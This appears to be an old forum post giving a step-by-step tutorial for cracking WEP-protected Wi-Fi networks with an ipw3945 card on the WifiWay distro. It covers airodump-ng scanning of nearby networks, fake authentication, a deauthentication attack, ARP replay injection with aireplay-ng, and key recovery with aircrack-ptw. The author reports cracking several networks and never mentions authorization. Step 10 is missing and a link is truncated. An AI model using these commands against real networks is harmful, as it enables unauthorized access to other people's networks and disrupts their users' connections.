Happy to say that I have been able to perform injection on ipw3945 cards using WifiWay. I tried BackTrack to no avail. It would seem that since they have a special "Load IPW3945" option they would have solved this problem. Turns out its a big fat "No" (I love the software though). So after a lot of digging around, it was apparent that the ipw3945 driver on BackTrack wasn't patched for injection (refer to Aircrack website for notes on how almost every driver needs to be patched for injection--they have no patch for ipw3945 as of now). Backtrack has lots of other drivers that are patched for injection (check this website for listings of card compatibility and patched drivers--http://backtrack.offensive-security.com/index.php?title=HCL:Wireless). Now the only thing on the internet (yes and I can say this with confidence cause I have SCOURED the internet) that claims to have a ready-to-rumble patched ip3945 driver is WifiWay. Good News first...it works ! Bad News..good support is difficult to find since everything is written in poor english (nothing personal guys :-) , i love the distro ). So I am writing this for all the rest of us ignorant non-spanish speaking Americans (aside-- if you need more tech info and come across a site in spanish, try google's page translator, it converts it from spanish to somewhat readable english). The first thing you will notice is that WifiWay is not as fancy as BackTrack in that it doesn't have all the bells and whistles but it gets the job done for ipw3945 cards. Also WifiWay is slightly different in the way it gets the job done. They use two different devices (virtual or otherwise), rtap0 for monitoring and wifi0 for injection. Also for those of you rebels (and I did this too) who don't like to follow directions, if you do a iwconfig or ifconfig on a system that has been cold booted, it might seem like the card is not being recognized as iwconfig shows up with rtap0 and wifi0 and others with no wireless extensions and ifconfig is equally stoic. Also wlanconfig stuff doesn't work and only comes up with operation not supported messages. But its ok, forget all that stuff for now. So follow these directions closely if not exactly and you will soon find yourself in Wifiland. I am assuming you have used a bootable copy of WifiWay.
First do this
1. airodump-ng rtap0
This step will help you find all the relevant info by exposing the networks around you. Kismet didn't work for me and I never really found Kismet to be of much use to me (I hear a lot of WHAT!'s..come on guys we are using airodump and the networks that matter are the only ones that it can see, doesn't matter if Kismet reports a thousand other networks. All the info you need for cracking can be obtained from airodump). If you already know the info of your targets (those of you who have unsuccessfully used BackTrack will have this) you can skip the first step
2. ifconfig wifi0 down -- brings the wifi0 device down for resetting
3. Click the Filesystem icon on desktop and get into /sys/class/net/wifi0/device and click on the rate file. Change it from 108 to 2. Remember to save changes (Ctrl+s)
4. Click on the channel file. Change it to whatever channel you want to be on (AP channel-- say from 1 to 11). Save changes.
5. Click on the bssid file. Change it to the bssid of the AP.Save changes.
6. ifconfig wifi0 up --brings wifi0 up again
7. airodump-ng -w file rtap0 -- you can use other filters for --bssid, --ivs etc
starts collecting data in file-0x.cap file where "x" is a number automatically assigned by airodump.
8. aireplay-ng -1 0 -e ESSID -a BSSID -h STATION wifi0
if this doesn't work (check this site for how success looks http://aircrack-ng.org/doku.php?id=f...ee175e572097e3
you can do this
aireplay-ng -1 6000 -o 1 -q 10 -e ESSID -a BSSID -h STATION wifi0.
If you see an associated client and would like to use a deauth attack instead you need to do
aireplay-ng -0 5 -a BSSID -c STATION
instead. Check Aireplay site for details, it has all the kinds of attacks available. Ah..before I forget, if you want to confirm injection capability of your ipw3945 card (technically you don't need to, I am telling you it works :-) ) or make sure the target is not quirky in any sense, you cannot use the -9 or --test attack in the aircrack version used by WifiWay maybe because its an older version of aircrack.Please let me know if you could get it to do the --test attack.
9. aireplay-ng -3 -b BSSID -h STATION wifi0
you should see the data packets (IV's) number rise in airdump. After collection sufficient data packets (IV's) do
and you should see all the file-0x.cap files
11. aircrack-ptw file-01.cap --- Aircrack will expose the WEP Key.
--> ESSID is the name of the network "John", "Cindy's Network" etc, BSSID is the MAC of the AP, STATION is the MAC of your wireless card.
Thats it. What I realized is that using WifiWay and ipw3945 is the easiest way to do this. My Dell with a Atheros card using madwifi-ng driver gave me much more trouble (btw you need to do wlanconfig to use madwifi-ng cause it creates Virtual AP's that use the same card and you can find stuff about it on the internet).
One problem I have faced (and this has nothing to do with WifiWay) is that for some networks after step 9, the read ARP count keeps rising up but the sent and got ARP packets number doesn't. They're stuck at zero ? I think this has to do with the network signal strength since all the networks I have been able to crack had high signal strength. I don't think its a MAC filter on the AP cause all these networks have open authentication and I can associate with them just fine (step 8). Would appreciate any suggestions.
Sorry about the noob'ishness. I know it would be awesome to actually compile this stuff in Linux and not use WifiWay (this is important not only to achieve independence but also power, since right now I am dependent on the version of Aircrack WifiWay incorporates in its software and of course can't mod it) but I am too busy and too new to Linux to do this. I would absolutely appreciate any suggestions and directions.
p.s. Respect your Freedom